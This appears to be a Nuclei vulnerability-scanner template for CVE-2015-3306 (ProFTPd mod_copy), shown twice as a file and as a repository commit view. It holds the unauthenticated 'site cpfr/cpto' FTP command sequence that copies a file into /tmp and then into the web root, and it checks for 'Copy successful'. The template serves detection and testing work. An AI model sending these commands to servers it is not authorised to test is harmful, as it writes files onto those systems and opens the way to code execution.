nuclei-templates/cves/2015/CVE-2015-3306.yaml

id: CVE-2015-3306

info:
  name: ProFTPd RCE
  author: pd-team
  severity: high
  reference: https://github.com/t0kx/exploit-CVE-2015-3306
  tags: cve,cve2015,ftp,rce

network:
  - inputs:
      - data: "site cpfr /proc/self/cmdline\r\n"
        read: 1024
      - data: "site cpto /tmp/.{{randstr}}\r\n"
        read: 1024
      - data: "site cpfr /tmp/.{{randstr}}\r\n"
        read: 1024
      - data: "site cpto /var/www/html/{{randstr}}\r\n"
    host:
      - "{{Hostname}}"
    # port:
    #   - 21
    read-size: 1024
    matchers:
      - type: word
        words:
          - "Copy successful"
:fire: Add CVE-2015-3306 2021-02-23 22:13:48 +00:00			`id: CVE-2015-3306`

			`info:`
			`name: ProFTPd RCE`
			`author: pd-team`
			`severity: high`
			`reference: https://github.com/t0kx/exploit-CVE-2015-3306`
			`tags: cve,cve2015,ftp,rce`

			`network:`
			`- inputs:`
			`- data: "site cpfr /proc/self/cmdline\r\n"`
			`read: 1024`
			`- data: "site cpto /tmp/.{{randstr}}\r\n"`
			`read: 1024`
			`- data: "site cpfr /tmp/.{{randstr}}\r\n"`
			`read: 1024`
			`- data: "site cpto /var/www/html/{{randstr}}\r\n"`
			`host:`
			`- "{{Hostname}}"`
			`# port:`
			`# - 21`
			`read-size: 1024`
			`matchers:`
			`- type: word`
			`words:`
			`- "Copy successful"`